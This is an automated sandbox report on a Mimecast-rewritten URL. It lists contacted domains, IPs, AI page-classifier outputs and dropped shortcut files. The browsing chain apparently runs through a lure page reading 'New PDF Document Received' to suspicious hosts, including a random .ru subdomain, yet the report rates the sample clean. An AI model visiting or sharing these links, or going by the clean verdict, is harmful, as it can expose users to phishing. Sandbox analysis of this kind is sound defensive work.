https://login-uk.mimecast.com/auth/api/ttp/remediation/get-file/eNpNkN1u4jAQRt_F19C1J7bjIO0FbRdVgUqINhBWlSLbmYTQ_NDEoe2u9t3XLFqpN3Mx-nTmO_ObDGjHHquczAg_HTZmf3o4Hm8r48SvzZhu5m-u5tvdIj3tnmK6TuL7ah0v1pw_F3bouiWlSZ2sVjyB6CP-sdf3drcOTfpY3sZpGr4fFqn53MO-3D4shvlPRkV-vMOXb-V3MiFNR2aFrgeckL6wCmBwozFk1o51PSHaOW0PDbZO9_ZQndF1r9j6miYbXynLmAqzc-7nNMqAAmfMLyHCKNcolGQQWKBhaJBDHoRSBjbgMkDOVF4wSa0BRpXVyqAQWoUsClBHvlXRNv7IOLIKguPHzaktydcyRVVfv8UuJwGYAOlBVDAfs-PgugZ72-XoI3fJUqm5Uhdq4_yianTp7a_MM_ZD1Xkj5vlXxX_gMrNTvDpCJLyjn1OV_Yd9kWU-5bBv5JRSH1EBFSFIKsmfvw9bjwg?sid=0yP3OYOZ4_6FmiX5Tl-QJweyJlbmMiOiJBMTI4R0NNIiwiYWxnIjoiUEJFUzItSFMyNTYrQTEyOEtXIiwia2lkIjoiWHp4SjlxSThDSzF5X3diNmpPSGRvYU5JdGxNaTE3RW1nVEdIb2FRck9NMCIsInAycyI6IlZMU0R1QVBIMkhFMlpsR3ZHN1VjQUEiLCJwMmMiOjgxOTJ9.NNSb-i2N3Bf2U-FvH5rqFZPJzKEi5EjU.3HG08Ns1V5-swsl6.Z0fjgHd3i7UbYApL1vqjTD1q17kfuVFKD0HzKElaejJa0SQjRvZse2E09kHfijWimUTQ4dotEDjUEi4ZBquyDL70O12VolgNiA8Y-IWL5gYGzBpLd_SzHpQBlID-XI5zV1_fHwEcdJnwbxE4iGLZVoZ9gmWD2fA7F1S5mMxBMTC6rf753C0szwuKPWQgTeF1Xo-lJucBxpXfoDvPvRUSLJ83E0nqEIY7agPY3g3HYkP67cIZ_lB8TAOTVnDkqd7XLL5ALUji87bxaW4.-JLSMOtKVHAy9NYu3_v2BA&x-context-route=administration&fdl=1	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
login-uk.mimecast.com	91.220.42.237	true	false	unknown
jimdo-dolphin-static-assets-prod.freetls.fastly.net	151.101.2.79	true	false	high
myqkz0xeyygfu46vw7rbgyj7tymnfyffdlgjxue07xli3ngcy4sae75xt1s.bfcgpixdwnw.ru	104.21.65.72	true	false	unknown
a.nel.cloudflare.com	35.190.80.1	true	false	high
at.prod.jimdo.systems	3.255.10.234	true	false	high
code.jquery.com	151.101.66.137	true	false	high
fccdl.in	12.7.192.62	true	false	unknown
cdnjs.cloudflare.com	104.17.25.14	true	false	high
jimdo-storage.freetls.fastly.net	151.101.2.79	true	false	high
challenges.cloudflare.com	104.18.94.41	true	false	high
www.google.com	142.250.181.100	true	false	high
aial.gulamberwa.com	172.67.166.101	true	false	high
assets.onestore.ms	unknown	unknown	false	high
ajax.aspnetcdn.com	unknown	unknown	false	high
c.s-microsoft.com	unknown	unknown	false	high
central-synagogue.jimdosite.com	unknown	unknown	false	unknown
fonts.jimstatic.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://aial.gulamberwa.com/ERA9sgQ/	false		unknown
https://central-synagogue.jimdosite.com/	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
152.199.19.160	unknown	United States	15133	EDGECASTUS	false
172.217.17.67	unknown	United States	15169	GOOGLEUS	false
172.217.17.46	unknown	United States	15169	GOOGLEUS	false
104.18.94.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
142.250.181.131	unknown	United States	15169	GOOGLEUS	false
104.18.41.38	unknown	United States	13335	CLOUDFLARENETUS	false
2.20.41.218	unknown	European Union	16625	AKAMAI-ASUS	false
151.101.130.137	unknown	United States	54113	FASTLYUS	false
23.217.249.187	unknown	United States	20940	AKAMAI-ASN1EU	false
23.32.239.59	unknown	United States	2828	XO-AS15US	false
151.101.66.137	code.jquery.com	United States	54113	FASTLYUS	false
172.217.21.35	unknown	United States	15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
172.67.189.38	unknown	United States	13335	CLOUDFLARENETUS	false
91.220.42.237	login-uk.mimecast.com	United Kingdom	42427	MIMECAST-UKGB	false
162.159.128.70	unknown	United States	13335	CLOUDFLARENETUS	false
151.101.194.79	unknown	United States	54113	FASTLYUS	false
104.17.24.14	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.65.72	myqkz0xeyygfu46vw7rbgyj7tymnfyffdlgjxue07xli3ngcy4sae75xt1s.bfcgpixdwnw.ru	United States	13335	CLOUDFLARENETUS	false
23.218.209.163	unknown	United States	6453	AS6453US	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
172.217.17.78	unknown	United States	15169	GOOGLEUS	false
12.7.192.62	fccdl.in	United States	30115	WIDEVOICEUS	false
3.255.10.234	at.prod.jimdo.systems	United States	16509	AMAZON-02US	false
104.18.95.41	unknown	United States	13335	CLOUDFLARENETUS	false
151.101.2.79	jimdo-dolphin-static-assets-prod.freetls.fastly.net	United States	54113	FASTLYUS	false
142.250.181.100	www.google.com	United States	15169	GOOGLEUS	false
74.125.205.84	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.32.239.81	unknown	United States	2828	XO-AS15US	false
172.67.166.101	aial.gulamberwa.com	United States	13335	CLOUDFLARENETUS	false
162.159.129.70	unknown	United States	13335	CLOUDFLARENETUS	false
23.32.239.43	unknown	United States	2828	XO-AS15US	false
104.17.25.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562195
Start date and time:	2024-11-25 10:32:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://login-uk.mimecast.com/auth/api/ttp/remediation/get-file/eNpNkN1u4jAQRt_F19C1J7bjIO0FbRdVgUqINhBWlSLbmYTQ_NDEoe2u9t3XLFqpN3Mx-nTmO_ObDGjHHquczAg_HTZmf3o4Hm8r48SvzZhu5m-u5tvdIj3tnmK6TuL7ah0v1pw_F3bouiWlSZ2sVjyB6CP-sdf3drcOTfpY3sZpGr4fFqn53MO-3D4shvlPRkV-vMOXb-V3MiFNR2aFrgeckL6wCmBwozFk1o51PSHaOW0PDbZO9_ZQndF1r9j6miYbXynLmAqzc-7nNMqAAmfMLyHCKNcolGQQWKBhaJBDHoRSBjbgMkDOVF4wSa0BRpXVyqAQWoUsClBHvlXRNv7IOLIKguPHzaktydcyRVVfv8UuJwGYAOlBVDAfs-PgugZ72-XoI3fJUqm5Uhdq4_yianTp7a_MM_ZD1Xkj5vlXxX_gMrNTvDpCJLyjn1OV_Yd9kWU-5bBv5JRSH1EBFSFIKsmfvw9bjwg?sid=0yP3OYOZ4_6FmiX5Tl-QJweyJlbmMiOiJBMTI4R0NNIiwiYWxnIjoiUEJFUzItSFMyNTYrQTEyOEtXIiwia2lkIjoiWHp4SjlxSThDSzF5X3diNmpPSGRvYU5JdGxNaTE3RW1nVEdIb2FRck9NMCIsInAycyI6IlZMU0R1QVBIMkhFMlpsR3ZHN1VjQUEiLCJwMmMiOjgxOTJ9.NNSb-i2N3Bf2U-FvH5rqFZPJzKEi5EjU.3HG08Ns1V5-swsl6.Z0fjgHd3i7UbYApL1vqjTD1q17kfuVFKD0HzKElaejJa0SQjRvZse2E09kHfijWimUTQ4dotEDjUEi4ZBquyDL70O12VolgNiA8Y-IWL5gYGzBpLd_SzHpQBlID-XI5zV1_fHwEcdJnwbxE4iGLZVoZ9gmWD2fA7F1S5mMxBMTC6rf753C0szwuKPWQgTeF1Xo-lJucBxpXfoDvPvRUSLJ83E0nqEIY7agPY3g3HYkP67cIZ_lB8TAOTVnDkqd7XLL5ALUji87bxaW4.-JLSMOtKVHAy9NYu3_v2BA&x-context-route=administration&fdl=1
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	CLEAN
Classification:	clean1.win@23/39@54/245

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.17.46, 74.125.205.84, 34.104.35.123
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://login-uk.mimecast.com/auth/api/ttp/remediation/get-file/eNpNkN1u4jAQRt_F19C1J7bjIO0FbRdVgUqINhBWlSLbmYTQ_NDEoe2u9t3XLFqpN3Mx-nTmO_ObDGjHHquczAg_HTZmf3o4Hm8r48SvzZhu5m-u5tvdIj3tnmK6TuL7ah0v1pw_F3bouiWlSZ2sVjyB6CP-sdf3drcOTfpY3sZpGr4fFqn53MO-3D4shvlPRkV-vMOXb-V3MiFNR2aFrgeckL6wCmBwozFk1o51PSHaOW0PDbZO9_ZQndF1r9j6miYbXynLmAqzc-7nNMqAAmfMLyHCKNcolGQQWKBhaJBDHoRSBjbgMkDOVF4wSa0BRpXVyqAQWoUsClBHvlXRNv7IOLIKguPHzaktydcyRVVfv8UuJwGYAOlBVDAfs-PgugZ72-XoI3fJUqm5Uhdq4_yianTp7a_MM_ZD1Xkj5vlXxX_gMrNTvDpCJLyjn1OV_Yd9kWU-5bBv5JRSH1EBFSFIKsmfvw9bjwg?sid=0yP3OYOZ4_6FmiX5Tl-QJweyJlbmMiOiJBMTI4R0NNIiwiYWxnIjoiUEJFUzItSFMyNTYrQTEyOEtXIiwia2lkIjoiWHp4SjlxSThDSzF5X3diNmpPSGRvYU5JdGxNaTE3RW1nVEdIb2FRck9NMCIsInAycyI6IlZMU0R1QVBIMkhFMlpsR3ZHN1VjQUEiLCJwMmMiOjgxOTJ9.NNSb-i2N3Bf2U-FvH5rqFZPJzKEi5EjU.3HG08Ns1V5-swsl6.Z0fjgHd3i7UbYApL1vqjTD1q17kfuVFKD0HzKElaejJa0SQjRvZse2E09kHfijWimUTQ4dotEDjUEi4ZBquyDL70O12VolgNiA8Y-IWL5gYGzBpLd_SzHpQBlID-XI5zV1_fHwEcdJnwbxE4iGLZVoZ9gmWD2fA7F1S5mMxBMTC6rf753C0szwuKPWQgTeF

LLM Input / Output

Input	Output
URL: https://login-uk.mimecast.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://login-uk.mimecast.com
URL: https://central-synagogue.jimdosite.com/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "New PDF Document Received", "prominent_button_name": "Review Document Here", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://central-synagogue.jimdosite.com/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Performing browser checks for safe connection.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://central-synagogue.jimdosite.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://central-synagogue.jimdosite.com
URL: https://central-synagogue.jimdosite.com/ Model: Joe Sandbox AI	{ "brands": [ "Jimdo" ] }
	{ "brands": [ "Jimdo" ] }
URL: https://central-synagogue.jimdosite.com/ Model: Joe Sandbox AI	{ "brands": [] }
	{ "brands": [] }
URL: https://central-synagogue.jimdosite.com/ Model: Joe Sandbox AI	```json{ "legit_domain": "jimdo.com", "classification": "known", "reasons": [ "The URL 'central-synagogue.jimdosite.com' is hosted on 'jimdosite.com', which is a subdomain of 'jimdo.com'.", "Jimdo is a known website builder platform, and 'jimdosite.com' is commonly used for sites created using Jimdo.", "The brand 'Jimdo' is correctly associated with the domain 'jimdo.com'.", "The presence of 'central-synagogue' as a subdomain suggests a user-created site, which is typical for Jimdo-hosted sites.", "No immediate signs of phishing in the URL structure, as it follows the pattern of user-created sites on Jimdo." ], "riskscore": 3}
URL: central-synagogue.jimdosite.com Brands: Jimdo Input Fields: unknown
URL: https://aial.gulamberwa.com/ERA9sgQ/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Verifying...", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://aial.gulamberwa.com/ERA9sgQ/ Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }
	{ "brands": [ "Cloudflare" ] }
URL: https://aial.gulamberwa.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://aial.gulamberwa.com
URL: https://www.microsoft.com/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Your current User-Agent string appears to be from an automated process, if this is incorrect, please click this link:", "prominent_button_name": "United States English Microsoft Homepage", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false }

URL: https://www.microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://www.microsoft.com
URL: https://www.microsoft.com/ Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://microsoft.com

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 25 08:32:55 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.98207902544385
Encrypted:	false
SSDEEP:
MD5:	EFCEF03C9CB52288FAEF972B0E264758
SHA1:	658859AD89949C116B50F4FAB9D99A84BADFA412
SHA-256:	D973175BD5AA13ECC006BB81B7794C8BF6BB8E01318FD814D539C3CB6A527F74
SHA-512:	A3EBA7EB812945C85530D58BFE6890EF010D068E6ADA7E3240F85037F10B88ED515364124088356D9B9B97AC0F8BE20BD9D9052A1328F0A84050931F3094B34A
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....j....?..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IyY.L....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VyY.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VyY.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VyY.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VyY.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q..W.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 25 08:32:55 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.9981005978481288
Encrypted:	false
SSDEEP:
MD5:	6525A82E518358F548FE3226DC89AC86
SHA1:	BCFC9EBF4343101BA95871225EBFCD13262BFB56
SHA-256:	734D9B1FACB8F7DD83050A66473B840FEE73FDE877D77D0772B3F88F44DB22D8
SHA-512:	A38BD5615AA1198EF915DF39143F5ED88802E273ECE5D1561966476A2A622A12B67203BF53B9C58CDBE35B15F481C7D1DCFFDD14C6DDEBDD5DF33DE7AA8046BD
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....m...?..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IyY.L....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VyY.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VyY.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VyY.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VyY.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q..W.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.008402682211769
Encrypted:	false
SSDEEP:
MD5:	0E3CB29CD57E179B825FE2A11C5F6318
SHA1:	3B580C3528A052AFC0086490E5A1A6C8D83D0E2D
SHA-256:	2CE7C062E3A84A2982F5A89D2E4BE0E2652C09A2CA9ACB268F246EDBDCCCEB18
SHA-512:	E4435A21AC12E529886F684508CE603CC8CD4798C349B67B0E2FCE110AEB5C3B4EC119773501A9326AD0D8AC40C8CF193F595FC930BC3E2624EBA10AA5EE62B4
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IyY.L....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VyY.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VyY.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VyY.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q..W.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 25 08:32:55 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9958667695257386
Encrypted:	false
SSDEEP:
MD5:	6AECFC2E1C03F9709F2612A57D61C5FE
SHA1:	2C50FA4686273A6A522C136BE96713D92DF81B9A
SHA-256:	D10830FC691CB88AF8DE50A27B106294CFC11D93AA01D2FF733C7940A8419780
SHA-512:	C9940973D0967CED3A274BB83C3EE4DFB8D97D779D8C26B5D8BED7A10FB377ED4812F4FB1B804E33B3DA82F9C037CE3B4046DBF44B8840D087521E0F192A6ACC
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....A...?..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IyY.L....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VyY.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VyY.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VyY.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VyY.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q..W.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 25 08:32:55 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9862727744373525
Encrypted:	false
SSDEEP:
MD5:	C72410E8C396FAC2615E3AA74338121C
SHA1:	672BA581185B4385CC5B1CC0E98D660167DC3BDC
SHA-256:	1B6D972B21D6D8A558D155145089C6363F351D5E5BA99754CBE39F6238D5AF68
SHA-512:	D6F6D26D2267DDEB480CED914C2B90780067A544B539F31D9BA44ABD1527A05EF1A8E38A0420129E04433B0FDE209BDACEBC02709FB9CE430F645923676C5B9A
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....K...?..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IyY.L....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VyY.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VyY.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VyY.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VyY.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q..W.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 25 08:32:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9968981023361687
Encrypted:	false
SSDEEP:
MD5:	122C065BD0D4D9429663ABCFCE719F06
SHA1:	1E7BFEC1A48AB1EA7E9D9786351315F216B3495C
SHA-256:	DAB158295857F0319D7E836815E65A056DDF61E57987C1EDE89BC8B8F81B2F5C
SHA-512:	06A5596B9F97098A7F8E87439338CEF9E73A941881A7D9F07699BDD2B367B4ED00E363B49F10C37131E0E23BCCEAB4DF68466D1BB924DDA89B55D1F2DCC80576
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.........?..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IyY.L....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VyY.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VyY.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VyY.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VyY.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q..W.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 100

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8035), with no line terminators
Category:	downloaded
Size (bytes):	8035
Entropy (8bit):	5.755908646446717
Encrypted:	false
SSDEEP:
MD5:	DAA0D396F9E4D49228F9CC6B21944CC9
SHA1:	3FBADA16634DA0D9C0A65850A29B0DDBE4051B82
SHA-256:	67FE9AA5CF803F15294949DE1B0F54A24C5EF1C41711F2BA360B580BE268C671
SHA-512:	2A25103FED7A76557FEEF2EDC6333931E228E329B1CEB5DEE0085293C1D248ACDFB2E2D20409D8F51D54CC5A0FEBB093522B7F0470AE6181B2736F9847AEDA48
Malicious:	false
Reputation:	unknown
URL:	https://central-synagogue.jimdosite.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js?
